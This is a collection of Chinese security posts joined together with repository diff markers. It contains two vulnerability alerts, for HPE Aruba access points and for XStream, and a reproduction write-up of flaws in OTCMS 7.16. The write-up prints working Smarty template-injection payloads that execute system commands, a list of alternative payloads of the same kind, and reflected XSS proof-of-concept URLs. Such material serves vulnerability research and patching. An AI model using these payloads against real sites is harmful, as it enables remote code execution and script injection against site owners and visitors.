HPE Aruba Networking Access Points是HPE旗下的Aruba Networking推出的一系列高性能无线接入点产品旨在为企业提供稳定、高效、安全的无线网络连接被广泛应用于企业、教育、商业等各种场景。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/7stTqD182SWpsmBToJ1PmvpWYLUqE5SKz2VpYvZKCBWZTYuxqkuZY3766tMibict8WacvbYoOCibO8QYTUvhMQgpw/640?wx_fmt=png&from=appmsg "")
**0x03 漏洞详情**
###
###
**CVE-2024-42509**
**漏洞类型:**
命令注入
**影响:**
执行任意命令
**简述:**
由于HPE Aruba Networking Access Points底层CLI服务中存在命令注入漏洞可能导致未经身份验证的威胁者通过向PAPI UDP端口发送特制数据包导致远程命令执行成功利用该漏洞可能导致在底层操作系统上以特权用户身份执行任意命令或代码。
###
**0x04 影响版本**
- AOS-10.4.x.x <= 10.4.1.4
- Instant AOS-8.12.x.x <= 8.12.0.2
- Instant AOS-8.10.x.x <= 8.10.0.13
**0x05****POC状态**
- 未公开
**0x06****修复建议**
**目前官方已发布漏洞修复版本,建议用户升级到安全版本******
https://www.hpe.com/

View File

@ -0,0 +1,44 @@
# 漏洞预警 | XStream栈溢出漏洞
浅安 浅安安全 2024-11-16 00:01
**0x00 漏洞编号**
- CVE-2024-47072
**0x01 危险等级**
- 高危
**0x02 漏洞概述**
XStream是一个用于在Java对象和XML之间相互转换的工具它能够将Java对象序列化为XML或JSON格式也可以将XML或JSON格式的数据反序列化为Java对象从而简化了数据的存储、传输和恢复。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/7stTqD182SWpsmBToJ1PmvpWYLUqE5SKR3Ce50wCJImsymoz7GSVlS2psLAvUzlIiaG7QS43dNib3ccr7RUyicfpQ/640?wx_fmt=png&from=appmsg "")
**0x03 漏洞详情**
###
###
**CVE-2024-47072**
**漏洞类型:**
栈溢出
**影响:**
服务中断
**简述:**
XStream 1.4.21之前版本中当XStream配置为使用BinaryStreamDriver时由于在反序列化某些特定输入时处理不当攻击者可以通过构造特定的二进制数据流作为输入导致在反序列化时进入无限递归从而触发栈溢出使应用程序崩溃并导致服务中断造成拒绝服务。
**0x04 影响版本**
- XStream < 1.4.21
**0x05****POC状态**
- 未公开
**0x06****修复建议**
******目前官方已发布漏洞修复版本,建议用户升级到安全版本**********
https://x-stream.github.io/

View File

@ -0,0 +1,161 @@
# 网太CMS漏洞复现
进击的HACK 2024-11-15 23:55
# 版本OTCMS_PHP_V7.16
搭建http://m.otcms.com/news/8388.html
## 漏洞1SSTI
**理解SSTI**SSTI服务器端模板注入SSTI和SQL注入原理差不多都是因为对输入的字符串控制不足把输入的字符串当成命令执行。
**造成漏洞的主要成因:**render_template渲染函数在渲染的时候对用户输入的变量不做渲染。
**理解render_template渲染函数**把HTML涉及的页面与用户数据分离开这样方便展示和管理。当用户输入自己的数据信息HTML页面可以根据用户自身的信息来展示页面。
**SSTI漏洞原理**服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web应用模板内容的一部分模板引擎在进行目标编译渲染的过程中执行了用户插入的可以破坏模板的语句因而可能导致了敏感信息泄露、代码执行、GetShell 等问题.
**注意:**这种模板不只存在于 Python 中凡是使用模板的地方都可能会出现SSTI 的问题SSTI 不属于任何一种语言,沙盒绕过也不是
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtw1naSZia2Sf3y1XZNuiaTr1GaM857YOJqiaov4HZDlCK9ffVV7pf0gceJw/640?wx_fmt=png&from=appmsg "")
**常见的模版**
**php**
<table><thead><tr><th style="line-height: 1.5em;letter-spacing: 0em;text-align: left;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgb(240, 240, 240);width: auto;height: auto;border-top-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;min-width: 85px;">Smarty</th><th style="line-height: 1.5em;letter-spacing: 0em;text-align: left;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgb(240, 240, 240);width: auto;height: auto;border-top-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;min-width: 85px;">很老的PHP模板引擎了非常的经典使用的比较广泛</th></tr></thead><tbody style="line-height: 1.5em;letter-spacing: 0em;border-width: 0px;border-style: initial;border-color: initial;"><tr style="background: none 0% 0% / auto no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;"><td style="min-width: 85px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;">Twig</td><td style="min-width: 85px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;">来自于Symfony的模板引擎易于安装和使用</td></tr><tr style="background: none 0% 0% / auto no-repeat scroll padding-box border-box rgb(248, 248, 248);width: auto;height: auto;"><td style="min-width: 85px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;">Blade</td><td style="min-width: 85px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;">Laravel 提供的一个既简单又强大的模板引擎</td></tr></tbody></table>
**Java**
<table><thead><tr><th style="line-height: 1.5em;letter-spacing: 0em;text-align: left;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgb(240, 240, 240);width: auto;height: auto;border-top-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;min-width: 85px;">JSP</th><th style="line-height: 1.5em;letter-spacing: 0em;text-align: left;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgb(240, 240, 240);width: auto;height: auto;border-top-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;min-width: 85px;">经典</th></tr></thead><tbody style="line-height: 1.5em;letter-spacing: 0em;border-width: 0px;border-style: initial;border-color: initial;"><tr style="background: none 0% 0% / auto no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;"><td style="min-width: 85px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;">FreeMarker</td><td style="min-width: 85px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;">一种基于模板和要改变的数据并用来生成输出文本。一个Java类库是一款程序员可以嵌入他们所开发产品的组件</td></tr><tr style="background: none 0% 0% / auto no-repeat scroll padding-box border-box rgb(248, 248, 248);width: auto;height: auto;"><td style="min-width: 85px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;">Velocity</td><td style="min-width: 85px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;">不仅可以替代JSP作为JavaWeb的服务端网页模板引擎还可以作为普通文本的模板引擎来增强服务端程序文本处理能力</td></tr></tbody></table>
**python**
<table><thead><tr><th style="line-height: 1.5em;letter-spacing: 0em;text-align: left;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgb(240, 240, 240);width: auto;height: auto;border-top-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;min-width: 85px;">Jinja2</th><th style="line-height: 1.5em;letter-spacing: 0em;text-align: left;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgb(240, 240, 240);width: auto;height: auto;border-top-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;min-width: 85px;">广泛</th></tr></thead><tbody style="line-height: 1.5em;letter-spacing: 0em;border-width: 0px;border-style: initial;border-color: initial;"><tr style="background: none 0% 0% / auto no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;"><td style="min-width: 85px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;">django</td><td style="min-width: 85px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;">使用别的就不能发挥出 django 的特性了django 以快速开发著称,但</td></tr><tr style="background: none 0% 0% / auto no-repeat scroll padding-box border-box rgb(248, 248, 248);width: auto;height: auto;"><td style="min-width: 85px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;">tornado</td><td style="min-width: 85px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;">tornado 强调的是异步非阻塞高并发</td></tr></tbody></table>
### 漏洞分析
功能点进行代码审计
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwiaiapto4K6VheA05PAnKN85kf6zzQEOjQia4VsoM3JPdh0C9a6iaSKoQibA/640?wx_fmt=png&from=appmsg "")
抓包:
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtw1naSZia2Sf3y1XZNuiaTr1GaM857YOJqiaov4HZDlCK9ffVV7pf0gceJw/640?wx_fmt=png&from=appmsg "")
打码审计
添加、修改文件处对函数$fileContent没有进行SSTI漏洞限制主要是对{{}}没有进行过滤
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwDNxI51yUxNfcqZWBj1rnJRFedpP9a6NAAIMBzpXzW1RHztQibtMIxmg/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwiatGvQC0BbSjOaTeoRmDsZn8HuWMw9IRRAIqQgAUpG7QhMKmZrzoCsg/640?wx_fmt=png&from=appmsg "")
### 漏洞复现
验证是否存在SSTI漏洞
1、查看使用模版引擎是Smarty
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwvXmwcSv4iajkFqyhQXDdo27WNUibQBYY3qx3tVXJ7iaicXYY7vqASSv9Hw/640?wx_fmt=png&from=appmsg "")
2、登录后台
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwO6Zl4Kvrq9aOJk7GZx0xoI2ZJM7AErx9JV0xKJxXORrgBhsd2xU0icQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwpxfCNoR7JJ74ZmoxiaOeVcib41ZOHLCG4VAHVL0WIxAkUb6SEpde3gJg/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwGzibVzqJxybhoXuIj83j01tEkcsZuYfyrrxjagialwMJ8Xg8dz8Jzg2Q/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwHafoQshULM5lbfZicNurc2YIfkg1sSb2SKejzuEyfHu8Mn691wrIBicA/640?wx_fmt=png&from=appmsg "")
修改内容为
```
{otcms:1*2}
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwDHeKl5xKy33wL8RK905q8S1LnTDjladqlqwT4amECiaXfHPKgLQuRKw/640?wx_fmt=png&from=appmsg "")
注入的表达式已经执行
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwgu5tOfBFWSBgnTwGr3ictLUaGcsY6vySpSV0icPL2TRY5ACibdG031Viaw/640?wx_fmt=png&from=appmsg "")
查看Smarty的版本
```
{otcms:version}
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwZL2fbmSFz8dzOtJnIbwakNucwbmm3TX3GCVW5oIR0H6V9vk2KmCZ0w/640?wx_fmt=png&from=appmsg "")
**注入poc**
**详见CVE-2021-26119**
```
{otcms:$smarty.template_object->smarty->_getSmartyObj()->display('string:{otcms:system(calc)}')}
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwQqvZEficLibUa2pFliax1JO110BCZoRiaibp6EMZoibH8ichAJMd120IncHicA/640?wx_fmt=png&from=appmsg "")
**常见poc**
```
string:{$smarty.template_object->smarty->enableSecurity()->display('string:{system(whoami)}')}
string:{$smarty.template_object->smarty->disableSecurity()->display('string:{system(whoami)}')}
string:{$smarty.template_object->smarty->addTemplateDir('./x')->display('string:{system(whoami)}')}
string:{$smarty.template_object->smarty->setTemplateDir('./x')->display('string:{system(whoami)}')}
string:{$smarty.template_object->smarty->addPluginsDir('./x')->display('string:{system(whoami)}')}
string:{$smarty.template_object->smarty->setPluginsDir('./x')->display('string:{system(whoami)}')}
string:{$smarty.template_object->smarty->setCompileDir('./x')->display('string:{system(whoami)}')}
string:{$smarty.template_object->smarty->setCacheDir('./x')->display('string:{system(whoami)}')}
```
## 漏洞二 xss漏洞
### 在apiRun.php接口处存在xss漏洞
定义变量
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwWArF71Dy3olhtd9UJvqc357cajAg5pllGaw9JahbpeDAAlTiafTjmTA/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwKKTw7v3TmOuScWZuDuKGF9QJ6pKYxLZdfuuWtyZLAvaFMgRx3FHFDA/640?wx_fmt=png&from=appmsg "")
**注入poc**
```
apiRun.php?mode=";alert(1);//&mudi=autoRun
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwZIrOvHnfmMU5gEwlmUEqUVcIyBhYen9toibSfGRmFNKYVlcjNnq6zVw/640?wx_fmt=png&from=appmsg "")
### 在inc\classAreaApp.php存在xss漏洞
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwd548OzXFJYfXyUnSISdzKKlcrBibmODzWIONxpTibSovaGffeX9ojyBQ/640?wx_fmt=png&from=appmsg "")
**注入POC**
```
http://www.otcms.com/wap/users/p.php?m=sendPhoneForm&dataID=7866&theme=1%22&_=1706170896361&type=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7EOwrFI0GcKaa1No4RicNtwJ1koyWhrBoLfEruIZpGk3azegdcXBFmbM1XAYh5E31XWgUmhfJ0BXA/640?wx_fmt=png&from=appmsg "")
参考文章:
https://xz.aliyun.com/t/13432?time__1311=Gqmxu7G%3DH4lx0nD2DU2YoGC3D8Qn5fox#toc-7
https://xz.aliyun.com/t/11108?time__1311=mqmx0DyDcDuGqq0vo4%2BxOD9WuKqDvN%2BQex&alichlgref=https%3A%2F%2Fxz.aliyun.com%2Fu%2F39303#toc-6